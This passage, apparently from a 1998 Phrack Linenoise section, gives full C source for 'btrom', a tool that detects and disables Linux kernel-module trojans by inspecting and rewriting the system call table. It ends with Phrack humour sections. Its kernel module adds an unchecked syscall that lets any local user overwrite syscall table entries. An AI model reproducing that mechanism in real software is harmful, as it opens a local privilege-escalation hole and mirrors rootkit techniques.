this program doesnt uninstall trojan modules.
this program disables the trojans, so, after that,
you can uninstall the trojan with 'rmmod'.
------------------------------------------------------------------------------
b u g s
------------------------------------------------------------------------------
if `insmod mbtrom' doesnt returns any value, is because you are redirecting
that message with syslogd. Please check /etc/syslog.conf and see "kern".
------------------------------------------------------------------------------
h i s t o r y
------------------------------------------------------------------------------
* version 0.3 (01/12/98) compatible with kernel 2.0 y 2.2.
works with BIG_KERNEL and with SMALL
english version
* version 0.2 (25/11/98) first version
* version 0.1 (21/11/98) something really ugly
* all this happened when i see the itf (intregated trojan facility in P52-18)
------------------------------------------------------------------------------
f e e d b a c k
------------------------------------------------------------------------------
riq@ciudad.com.ar
<++> linenoise/btrom/Makefile
#
# Makefile del b t r o m
#
## BUG. This must be the same as the one in config.h
SYSTEM_MAP = "/usr/src/linux/System.map"
AWK = awk
CC = gcc
#CFLAGS = -DSYSTEM_MAP=$(SYSTEM_MAP)
all: parse btrom mbtrom
parse:
$(AWK) -f sys_null.awk $(SYSTEM_MAP) > sys_null.h
btrom: btrom.o
$(CC) btrom.c -O2 -Wall -o btrom
mbtrom:
$(CC) -c -O3 -Wall -fomit-frame-pointer mbtrom.c
clean:
rm -f mbtrom.o btrom.o btrom sys_null.h
<-->
<++> linenoise/btrom/btrom.c
/*
* btrom - Borra Trojanos Modulo
* por Riq
* 1/Dic/98: 0.3 - Compatible con kernel 2.2 y soporta BIG_KERNEL
* 25/Nov/98: 0.2 - Version inicial. Soporta kervel 2.0 i386
*/
#include <stdio.h>
#include <unistd.h>
#include <asm/unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <fnmatch.h>
#include <strings.h>
#include <linux/sys.h>
#include "config.h"
#include "sys_null.h"
FILE *sm;
FILE *au;
int quiet;
int borrar;
int dif_n_s;
unsigned int big_kernel;
/***********************************************************************
System.map
************************************************************************/
int sm_b_x_nom( unsigned int *address, char *estoy )
{
char buffer[200];
char sys_add[20];
fseek(sm,0L,SEEK_SET);
while( fgets(buffer,200,sm) ) {
if( fnmatch(estoy,buffer,0)==0 ) {
strncpy(sys_add,buffer,8);
sys_add[8]=0;
*address = strtoul(sys_add,(char **)NULL,16);
return 1;
}
}
return 0;
}
int sm_busca_x_nombre( unsigned int *address, char *estoy)
{
char nombre[50];
sprintf(nombre,"*T sys_%s\n",estoy);
return sm_b_x_nom(address, nombre);
}
FILE* sm_open()
{
return fopen( SYSTEM_MAP, "r" );
}
/***********************************************************************
asm/unistd.h
************************************************************************/
void au_dame_el_nombre( char *dst, char *orig )
{
int i,j;
j=i=0;
while( orig[i]!='_' )
i++;
i=i+5;
while( orig[i]!=' ' && orig[i]!='\t' )
dst[j++]=orig[i++];
dst[j]=0;
}
int au_b_x_num( char *nombre, int numero )
{
char buffer[200];
char buscar[50];
/* FIXME: ?sera mas efectivo regexec() que fnmatch()? */
sprintf(buscar,AU_PREFIX"%i*",numero);
while( fgets(buffer,200,au) ) {
if( fnmatch(buscar,buffer,0)==0 ) {
au_dame_el_nombre(nombre,buffer);
return 1;
}
}
/* No encontre... entonces una segunda pasada */
fseek(au,0L,SEEK_SET);
while( fgets(buffer,200,au) ) {
if( fnmatch(buscar,buffer,0)==0 ) {
au_dame_el_nombre(nombre,buffer);
return 1;
}
}
return 0;
}
int au_busca_x_numero(char *nombre, int numero)
{
return au_b_x_num(nombre,numero);
}
FILE* au_open()
{
return fopen( ASM_UNISTD, "r" );
}
/*****************************************/
/* Comun a la primer y segunda recorrida */
/*****************************************/
int comun_1er_2da( int j, int i , char *nombre , char *c, int clean, unsigned int retval)
{
int a;
a = clean; /* bug fix */
nombre[0]=0;
/* i!=0 porque el asm/unistd del kernel 2.2 no viene */
if( i!=0 && au && au_busca_x_numero(nombre,i)) {
if( retval > big_kernel + LIMITE_SYSCALL ) {
*c = '*' ;
clean++;
} else
*c = ' ';
} else {
if( retval > big_kernel+LIMITE_SYSCALL )
*c = '!';
else
*c = '?';
clean++;
}
if(i==j) { /* modulo btrom */
*c='-';
clean=a;
} else if(retval==SYS_NULL || retval==0) {/* Null pointer */
*c='N';
clean=a;
}
return clean;
}
/**********************************************************************
primer_recorrida: Detectar troyanos
**********************************************************************/
int primer_recorrida(int j)
{
char nombre[50];
int address;
int i,old_clean,clean;
unsigned int retval;
char c;
old_clean=clean=0;
printf( "\n1st part: Detect trojans\n"
" [ ]=OK [N]=Null [-]=btrom\n"
" [?] Mmm...syscall\n"
" Address [*][!]=trojan routine\n"
" now System.map Num [ ] Syscall Name\n"
"----------------------------------------------\n");
for( i=0; i< NR_syscalls; i++ ){
__asm__ volatile (
"int $0x80":"=a" (retval):"0"(j),
"b"((long) (i)),
"c"((long) (0)),
"d"((long) (0)));
clean = comun_1er_2da(j,i,nombre,&c,clean,retval);
if( !quiet || clean > old_clean ) {
if( nombre[0]!=0 ) {
if( sm && sm_busca_x_nombre(&address,nombre)) {
if(retval!=address && retval < big_kernel + LIMITE_SYSCALL) {
dif_n_s++;
printf("%8x!%8x %3i [%c] %s\n",retval,address,i,c,nombre);
} else printf("%8x %8x %3i [%c] %s\n",retval,address,i,c,nombre);
} else printf("%8x %3i [%c] %s\n",retval,i,c,nombre);
} else printf("%8x %3i [%c]\n",retval,i,c);
old_clean = clean;
}
}
return clean;
}
/**********************************************************************
segunda_recorrida: Limpiar troyanos
**********************************************************************/
int segunda_recorrida(int j)
{
char nombre[50],dire[50];
int address;
int i,old_clean,clean,retval,key;
char c;
unsigned int k;
old_clean=clean=0;
printf( "\n2nd part: Clean Trojans\n"
" s = System.map address\n"
" c = clean address\n"
" m = manual address\n"
" i = ignore\n"
" now System.map Num [ ] Syscall Name\n"
"---------------------------------------\n");
for( i=0; i< NR_syscalls ; i++ ){
__asm__ volatile (
"int $0x80":"=a" (retval):"0"(j),
"b"((long) (i)),
"c"((long) (0)),
"d"((long) (0)));
clean = comun_1er_2da(j,i,nombre,&c,clean,retval);
if( clean > old_clean ) {
if( nombre[0]!=0 ) {
if( sm && sm_busca_x_nombre(&address,nombre)) {
if(retval!=address && retval < big_kernel + LIMITE_SYSCALL) {
dif_n_s++;
printf("%8x!%8x %3i [%c] %s <s/c/m/I>?",retval,address,i,c,nombre);
} else printf("%8x %8x %3i [%c] %s <s/c/m/I>?",retval,address,i,c,nombre);
} else printf("%8x %3i [%c] %s <c/m/I> ?",retval,i,c,nombre);
} else printf("%8x %3i [%c] <c/m/I> ?",retval,i,c);
old_clean = clean;
fseek(stdin,0L,SEEK_END);
key=fgetc(stdin);
switch(key) {
case 's':
k = address;
break;
case 'c':
k = SYS_NULL;
break;
case 'm':
printf("Enter an hexa address (ex: 001a1b):");
fseek(stdin,0L,SEEK_END);
fgets( dire,50,stdin );
k = strtoul(dire,(char **)NULL,16);
break;
default:
k=1;
break;
}
/* FIXME: 1 no se puede poner como address */
if(k!=1)
__asm__ volatile (
"int $0x80":"=a" (retval):"0"(j),
"b"((long) (i)),
"c"((long) (1)),
"d"((long) (k)));
}
}
return clean;
}
void help()
{
printf( "\nUsage: btrom nr_of_mbtrom [-c][-v]\n"
"\t1) Install the module mbtrom with`insmod mbtrom'\n"
"\t2) The module must return a value.If not see the README->bugs\n"
"\t btrom value_returned_by_mbtrom [-c][-v]\n"
"\t `v' is verbose. Recommended\n"
"\t `c' is clean. Cleans the trojans\n"
"\t3) Uninstall the module mbtrom with 'rmmod mbtrom'\n"
"\n"
"\tExamples:\n"
"\t btrom 215 -cv\n"
"\t btrom 214 -v\n"
"\t btrom 215\n"
"\nWarning: Dont put random numbers. Be careful with that!"
"\nRecommended: Do `btrom _number_ -v' before a cleaning\n\n"
);
exit(-1);
}
void chequear_argumentos( char *parametros )
{
int i,j;
i=strlen(parametros);
if(parametros[0]!='-') help();
for(j=1;j<i;j++) {
switch(parametros[j]) {
case 'c':
borrar = 1;
break;
case 'v':
quiet = 0;
break;
default:
help();
}
}
}
int main(int argc, char **argv, char **envp )
{
unsigned int retval;
int clean;
int i;
printf( "\n\n"
"b t r o m b y r i q\n"
"v"VERSION"\n");
if(argc <2 || argc >3 ) help();
quiet = 1; borrar = 0 ;
if( argc==3) chequear_argumentos(argv[2]);
au = au_open();
sm = sm_open();
if(!au && !quiet)
printf("Error while opening `asm/unistd.h' in `"ASM_UNISTD"'\n");
if(!sm && !quiet)
printf("Error while opening `System.map' in `"SYSTEM_MAP"'\n");
dif_n_s=0;
/* __NR_mbtrom number */
i = atoi( argv[1] );
if(!i)
help();
/* Chequeo si es BIG_KERNEL o no */
__asm__ volatile (
"int $0x80":"=a" (retval):"0"(i),
"b"((long) (0)),
"c"((long) (2)),
"d"((long) (0)));
big_kernel =(retval>BIG_KERNEL?BIG_KERNEL:SMALL_KERNEL);
/* Primer recorrida */
clean = primer_recorrida( i );
/* Mensaje del senior btrom */
printf( "\nb t r o m s a y s:\n");
if(dif_n_s>0) {
printf( "Your System.map seems to have a problem.\n");
if(dif_n_s<SYSMAP_LIMIT)
printf( "Wait. Perhaps this is not a System.map problem,\n"
"but something related with the new functions names.\n"
);
else
printf( "Are you sure that you have a valid System.map ?\n");
if(clean)
printf( "Oh no! The problem is the trojan that you have ;-)\n");
}
if(!clean) {
printf( "You system call table seems to be clean.\n");
if(quiet)
printf("If you want to be more sure use the `-v' option\n");
} else {
printf( "\nWhat do you want to do with the trojan?\n"
"What about cleaning it with `btrom _numero_ -c'?\n" );
}
/* Ah borrar los troyanos se ha dicho */
if(borrar && clean) {
if(au)
fseek(au,0L,SEEK_SET);
if(sm)
fseek(sm,0L,SEEK_SET);
segunda_recorrida( i );
}
if(au)
fclose(au);
if(sm)
fclose(sm);
return 0;
}
<-->
<++> linenoise/btrom/config.h
/*
config.h
usado por btrom.c y mbtrom.c
*/
/*
Modificar segun los gustos
*/
/* Numero que uno supone que esta vacio en la sys_call_table */
#define NUMERO_VACIO 215
/* Path al archivo System.map */
/* Si Ud. nunca compilo el kernel tal vez sea /boot/System.map */
/* FIXME: Usar el define del Makefile para no definir esto en 2 partes */
#ifndef SYSTEM_MAP
#define SYSTEM_MAP "/usr/src/linux/System.map"
#endif
/* Hay problemas con old y new. Gralmente no es problema de la System.map */
#define SYSMAP_LIMIT 8
/* Path al archivo asm/unistd.h */
#define ASM_UNISTD "/usr/include/asm/unistd.h"
/* Prefijo a buscar en asm/unistd.h*/
#define AU_PREFIX "#define*__NR_*"
/* Hasta donde llega el kernel space */
/* FIXME: No se cual es el limite realmente. Igual con esto anda :-) */
#define LIMITE_SYSCALL 0x00300000
/*
No modificar
*/
/* Version del btrom */
#define VERSION "0.3"
/* BIG_KERNEL y SMALL_KERNEL*/
#define BIG_KERNEL 0xc0000000
#define SMALL_KERNEL 0x00100000
<-->
<++> linenoise/btrom/mbtrom.c
/*
* modulo del btrom - Borra Trojanos Modulo
* 25/11/98 - por Riq
*
* compile with:
* gcc -c -O3 -fomit-frame-pointer mbtrom.c
*
*/
#define MODULE
#define __KERNEL__
#include <linux/config.h>
#ifdef MODULE
#include <linux/module.h>
#include <linux/version.h>
#else
#define MOD_INC_USE_COUNT
#define MOD_DEC_USE_COUNT
#endif
#include <syscall.h>
#include <linux/string.h>
#include <linux/types.h>
#include <linux/fs.h>
#include <linux/mm.h>
#include <linux/malloc.h>
#include <linux/dirent.h>
#include <linux/sys.h>
#include <linux/linkage.h>
#include <asm/segment.h>
#include "config.h"
#include "sys_null.h"
extern void *sys_call_table[];
int __NR_mbtrom;
int* funcion( int numero, int modo, unsigned int *address )
{
switch(modo){
case 0:
return sys_call_table[numero];
break;
case 2:
return (void *)&sys_call_table;
case 1:
default:
sys_call_table[numero]=address;
break;
}
return (void *)0;
}
int init_module(void)
{
__NR_mbtrom = NUMERO_VACIO ;
/* Chequea direccion vacia desde NUMERO_VACIO hasta 0 */
while ( __NR_mbtrom!= 0 &&
sys_call_table[__NR_mbtrom] != 0 &&
sys_call_table[__NR_mbtrom] != (void *)SYS_NULL )
__NR_mbtrom--;
if(!__NR_mbtrom ) { /* Si es 0 me voy */
printk("mbtrom: Oh no\n");
return 1;
}
sys_call_table[__NR_mbtrom] = (void *) funcion;
if( __NR_mbtrom != NUMERO_VACIO )
printk("mbtrom: Mmm...\n");
printk("mbtrom: -> %i <-\n",__NR_mbtrom);
return 0;
}
void cleanup_module(void)
{
sys_call_table[__NR_mbtrom] = 0;
printk("mbtrom: Bye.\n");
}
<-->
<++> linenoise/btrom/sys_null.awk
/sys_ni_syscall/ { print "#define SYS_NULL 0x"$1 }
<-->
0x6>-------------------------------------------------------------------------
----[ PDM
Phrack Doughnut Movie (PDM) last issue was `Miller's Crossing`.
PDM53 recipients:
None of you suckers. Go rent it. It's well worth your time.
PDM54 Challenge:
"I have John Murdock... In mind..."
0x7>-------------------------------------------------------------------------
----[ Super Elite People That REad Phrack (SEPTREP)
New addiitons: Ron Rivest, W. Richard Stevens
Why they are SEP: One is the `R` in RSA. The other writes TCP/IP bibles.
----[ Current List
W. Richard Stevens
Ron Rivest
-----------------------------------------------------------------------------
----[ EOF
|